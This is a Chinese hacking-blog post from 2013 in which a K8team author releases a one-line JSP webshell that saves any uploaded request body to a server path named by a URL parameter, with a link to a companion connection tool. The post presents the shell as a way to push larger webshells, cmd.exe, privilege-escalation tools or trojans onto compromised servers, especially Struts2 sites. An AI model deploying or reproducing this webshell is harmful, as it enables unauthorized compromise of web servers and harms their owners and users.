注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[原创]新型JSP小马(支持上传任意格式文件) 附有连接工具  

2013-11-26 21:11:50|  分类: 原创工具 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
工具: K8upload_1125[K8]
编译: K8小组专用 Delphi7破解版
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2013/11/26 21:02:52


K8新型JSP小马(支持上传任意格式文件)  附有连接工具  以下代码自己保存为 upload.jsp
<%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>
灵感来自于前断时间写的HTTP协议的马,除了JSP其它脚本也会陆续公开给大家
其实就是文件流操作,WEB程序员们经常用到,上传图片各种文件啥的,
但没人想到过用在这方面,对于JAVA我也不怎么懂,这个一句话,我也是百度关键字 JSP 文件流后
从百度那些Web程序员几百行代码的文件流操作例子里  浓缩出来的  其实我不懂JAVA,看得头真大 。


简介:

传统小马只支持上传大马等文本文件,我们一般都是先把大马传到服务器,
然后再上传cmd.exe或pr.exe等等其它相关提权工具,又或者直接上传木马.
但是有时候,我们根本就无法上传WebShell大马,或者说传过去功能爆废了.
特别是Struts2环境,大家应该深有感悟。碰到好多,只能传那个普通的一句话小马
但是要传个大马啥的,基本上全都废了。但是这样我们就没办法了吗?答案是NO.

图片:
[原创]K8新型JSP小马(支持上传任意格式文件) 附有连接工具 - K8拉登哥哥 - K8拉登哥哥s Blog
 

功能:


下载地址:
文件: K8upload_1125[K8].rar
MD5: D55CAFE4E1764825C0980C701A84EDC2
SHA1: 3BA9F7CBECB9C95B8272EEB280D2F323123D4AAE
平台: XP/Vista/Win7/Win8/2000/2003/2008/2012
猛击: http://pan.baidu.com/s/1gI3n

提示:
下载后一定要校验文件的SHA1值是否正确,如不符则可能文件损坏或被人捆木马.
不推荐校验MD5 (微软官方主页上的产品都不再提供文件的MD5),因为可以碰撞
校验MD5并不能保证你所使用的就真是原文件,一般的黑客搞不了,但XX黑客就...

注意:
在K8拉登哥哥BLOG里下载的,工具一但更新,旧版地址若是失效,将不再提供下载.
  评论这张
 
阅读(6952)| 评论(1)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016